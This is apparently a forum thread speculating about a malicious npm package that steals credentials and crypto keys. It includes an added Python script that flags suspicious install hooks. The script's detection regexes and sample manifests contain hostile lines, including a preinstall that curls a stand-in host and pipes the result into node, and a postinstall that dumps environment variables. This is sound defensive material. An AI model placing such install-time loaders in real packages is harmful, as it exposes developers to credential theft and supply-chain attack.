I really want to know what would've happened with an npm install; I guess something boring like crypto mining or identity theft?

You can actually test it yourself. The actual URL is in the post and the website is still up.

Seems like it actually loads a PNG image now, maybe the npm script adds some additional headers to trigger the payload.

AFAIK most malware like this first sends the contents of your environment variables, ssh keys, passwords, etc. to the server, and then sets up a persistent process that executes arbitrary commands received from the attacker's server at any time, allowing them to run whatever else they want.
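For the install-time behaviour the comment above describes (a lifecycle script that reaches out to a remote host and runs what it gets back), here is an added defender-side example, not code from this thread: a small audit that parses package.json manifests and flags install hooks that fetch remote content, pipe into an interpreter, or read the environment. The regexes are assumed heuristics and the three manifests are constructed samples.

```python
"""Flag npm install-time lifecycle scripts that look like remote payload loaders.
Added example; the detection patterns are heuristics, not a complete signature set."""
import json
import re
from typing import Dict, List

# Hooks npm runs automatically as part of `npm install` (prepare runs on local installs)
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic patterns (assumed) for scripts that fetch, evaluate, or exfiltrate
SUSPICIOUS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b|fetch\(|https?://", re.I),
    "inline_eval": re.compile(r"node\s+-e\b|\beval\(|new Function\(", re.I),
    "shell_pipe_exec": re.compile(r"\|\s*(sh|bash|node)\b"),
    "env_dump": re.compile(r"process\.env|\$\{?(HOME|SSH_AUTH_SOCK|NPM_TOKEN)\b", re.I),
}


def audit_manifest(manifest_json: str) -> List[Dict[str, str]]:
    """Return one finding per install hook whose command matches a heuristic."""
    pkg = json.loads(manifest_json)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = sorted(name for name, rx in SUSPICIOUS.items() if rx.search(cmd))
        if reasons:
            findings.append({"package": pkg.get("name", "?"), "hook": hook,
                             "command": cmd, "reasons": ",".join(reasons)})
    return findings


# Constructed sample manifests: one benign native build, two install-time loaders
BENIGN = json.dumps({"name": "good-lib", "version": "1.0.0",
                     "scripts": {"postinstall": "node-gyp rebuild", "test": "jest"}})
LOADER = json.dumps({"name": "evil-lib", "version": "0.0.1",
                     "scripts": {"preinstall": "curl -s https://example.invalid/p.png | node"}})
ENV_LEAK = json.dumps({"name": "sneaky-lib", "version": "0.0.2",
                       "scripts": {"postinstall": "node -e \"console.log(JSON.stringify(process.env))\""}})

if __name__ == "__main__":
    for manifest in (BENIGN, LOADER, ENV_LEAK):
        for f in audit_manifest(manifest):
            print(f"[{f['package']}] {f['hook']}: {f['reasons']} -> {f['command']}")
```

Running it with `npm config get ignore-scripts` set to true is the complementary control: the audit tells you which packages you would be trusting if scripts were allowed.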

Arbitrary remote code execution, maybe sold to the highest bidder like some shady cloud provider?

Compromise of the developer's access, API keys, etc. in order to create a supply chain attack.

This has happened to me; it was an attack that was trying to get crypto private keys (Ethereum).